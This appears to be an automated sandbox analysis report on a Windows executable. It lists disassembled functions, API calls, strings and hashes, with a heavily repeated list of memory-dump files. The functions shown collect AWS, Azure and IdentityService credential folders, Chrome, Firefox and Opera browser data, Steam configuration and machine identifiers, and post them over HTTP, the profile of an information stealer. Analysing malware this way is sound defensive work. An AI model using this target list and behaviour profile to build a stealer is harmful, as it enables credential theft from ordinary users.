                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                • String ID: CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 11
                                                                                                                                                                                                                                                                                • API String ID: 3466090806-605346811
                                                                                                                                                                                                                                                                                • Opcode ID: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                                • Instruction ID: 4649c964c2ac6d4717e2a874ab9f529b914844d538cc1ef61ec3e528cde88b08
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C11B271340310BBE7206B60EC4AF5BBAAAEB84B56F10402AF345E71E1C6B45C80CB99
                                                                                                                                                                                                                                                                                Function 004166A0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 182stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004166BC
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 004166DE
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\.azure\), ref: 004166ED
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: wsprintfA.USER32 ref: 00415DBE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: FindFirstFileA.KERNEL32(?,?), ref: 00415DCF
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: strlen.MSVCRT ref: 00415F1C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415F5B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: strlen.MSVCRT ref: 00415FC7
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416330: memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 00416004
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00416772
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,00000028), ref: 00416794
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\.aws\), ref: 004167A3
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00416828
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,0000001C), ref: 0041684A
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416859
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcat$memset$memcmpstrlen$FileFindFirstFolderPathlstrcpywsprintf
                                                                                                                                                                                                                                                                                • String ID: JB$\.IdentityService\$\.aws\$\.azure\
                                                                                                                                                                                                                                                                                • API String ID: 3008122021-3834632163
                                                                                                                                                                                                                                                                                • Opcode ID: a98f44546dc83d83092c0b59d743b05ef3ed3a32d71f5366ac4852f18bdd0379
                                                                                                                                                                                                                                                                                • Instruction ID: 9794ee9d7d5702d65981f79f32deebafb897a1fd212e6a52f5b9a62acbb35f13
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a98f44546dc83d83092c0b59d743b05ef3ed3a32d71f5366ac4852f18bdd0379
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF61BF71900748A7DB00EF75D9C69E97368BF98308F40925AFD056A143EB78EAC9C7D4
                                                                                                                                                                                                                                                                                Function 00417270 Relevance: 20.5, APIs: 9, Strings: 2, Instructions: 1231networkstringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                  • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,?,?,00000000,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 004172E5
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00418606), ref: 004172EC
                                                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00418606), ref: 0041730C
                                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 004175AD
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET ref: 00417682
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET ref: 004176A6
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402AA0: InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402AA0: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                  • Part of subcall function 004132F0: StrCmpCA.SHLWAPI(00000000,block), ref: 00413315
                                                                                                                                                                                                                                                                                  • Part of subcall function 004132F0: ExitProcess.KERNEL32 ref: 0041331D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403920: InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403920: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412C64
                                                                                                                                                                                                                                                                                  • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412CA9
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E440: StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,?,?,?,?), ref: 00417C10
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403920: InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403920: HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00403920: InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                  • Part of subcall function 00412E50: strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                  • Part of subcall function 00412F60: strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                  • Part of subcall function 00416FC0: lstrlenA.KERNEL32(00000000), ref: 00417011
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FE0: RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FE0: RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FE0: RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                • C:\ProgramData\, xrefs: 0041756F
                                                                                                                                                                                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00417C0B
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Open$Internet$Heaplstrcatlstrcpylstrlenstrtok_s$Process$AllocCloseCreateDirectoryEvent$ConnectExitHandleHttpInformationNameOptionQueryRequestUserValueVolumeWindowswsprintf
                                                                                                                                                                                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890$C:\ProgramData\
                                                                                                                                                                                                                                                                                • API String ID: 818183501-1067945926
                                                                                                                                                                                                                                                                                • Opcode ID: 253828e2193622bca8c3790444a1af86ecf04706f1a61c859db2bb880bb83f3a
                                                                                                                                                                                                                                                                                • Instruction ID: d3f20ebcfaa0f86e13ddee9407f56ad69643857b77905c87f50bde3cae6408d9
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 253828e2193622bca8c3790444a1af86ecf04706f1a61c859db2bb880bb83f3a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43C2A331C10B599BDB11EFB5C9815EEB378BF18308F00964EE85567142EB78BAC9CB94
                                                                                                                                                                                                                                                                                Function 0040E440 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 598COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040E740
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,opera), ref: 0040E5B9
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B4E0: StrCmpCA.SHLWAPI(00000000,Opera GX,0042150A,0042150A), ref: 0040B523
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E923
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcpy
                                                                                                                                                                                                                                                                                • String ID: Stable\$chrome$firefox$opera
                                                                                                                                                                                                                                                                                • API String ID: 3722407311-3146807071
                                                                                                                                                                                                                                                                                • Opcode ID: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                • Instruction ID: 22bc5863ea798df5109445d1e364a8a74c8a3d857c00c7bd5e27f083e93039e9
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94429131D00B099BDB05EF75C981AEAB7B4FF18308F008159F9556B252EB38BAD5CB94
                                                                                                                                                                                                                                                                                Function 00410540 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 133memorystringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                • GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                • String ID: %08lX%04lX%lu$:\$C
                                                                                                                                                                                                                                                                                • API String ID: 1059865016-545181305
                                                                                                                                                                                                                                                                                • Opcode ID: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                • Instruction ID: daccc5cf811b00eb36f485bb9bb5cfb034b4705064687d02f987ca2459062bbc
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6141D4705083107BD301BB718C85BBF7AE99FC5784F00491EF58597291EBBC99829BAA
                                                                                                                                                                                                                                                                                Function 00418400 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0041841D
                                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418444
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
